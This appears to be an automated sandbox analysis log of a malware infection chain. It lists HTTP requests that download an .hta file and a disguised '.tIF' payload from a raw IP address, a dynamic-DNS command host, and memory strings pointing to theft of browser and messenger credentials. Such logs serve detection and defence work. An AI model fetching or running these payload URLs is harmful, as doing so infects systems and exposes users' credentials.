                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 142.93.65.161Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 142.93.65.161If-Range: "26ff2-6285702adf515"
                  Source: global trafficHTTP traffic detected: GET /680/weneedkissingwellongirlfriendshebeautifulgirl.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 142.93.65.161Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 03 Dec 2024 05:33:52 GMTConnection: Keep-AliveHost: 142.93.65.161If-None-Match: "26ff2-6285702adf515"
                  Source: global trafficHTTP traffic detected: GET /680/SRVRER.txt HTTP/1.1Host: 142.93.65.161Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /680/SRVRER.txt HTTP/1.1Host: 142.93.65.161Connection: Keep-Alive
                  Source: bhv5265.tmp.29.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001D.00000002.547955007.000000000029C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001D.00000002.547955007.000000000029C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: bhv5265.tmp.29.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: short.ruksk.com
                  Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                  Source: global trafficDNS traffic detected: DNS query: apamanollonan.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487780679.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.0000000003A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/
                  Source: mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/6
                  Source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedk
                  Source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF
                  Source: powershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF1
                  Source: powershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFA
                  Source: powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFC:
                  Source: powershell.exe, 00000012.00000002.505196924.000000001A931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFa%0I
                  Source: powershell.exe, 00000012.00000002.505196924.000000001A931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFk%0I
                  Source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFp
                  Source: mshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
                  Source: mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...
                  Source: mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...0n
                  Source: mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...r
                  Source: mshta.exe, 00000004.00000002.446412500.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...rTm
                  Source: mshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaG
                  Source: mshta.exe, 0000000E.00000003.490334526.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.0000000000188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htacC:
                  Source: mshta.exe, 00000004.00000002.446594569.0000000002DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaeHP
                  Source: mshta.exe, 00000004.00000003.443541028.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445667762.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.488460874.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htahttp://142.93.65.1
                  Source: mshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htak
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htapC:
                  Source: mshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&XKy
                  Source: mshta.exe, 00000004.00000003.440649981.0000000000162000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446606437.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemaker
                  Source: mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemakerTK
                  Source: mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htay
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.473316971.000000001A77B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheIi
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: CasPol.exe, 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000007.00000002.474546983.000000001C45C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.505629322.000000001C211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                  Source: powershell.exe, 00000007.00000002.467820686.0000000002B76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
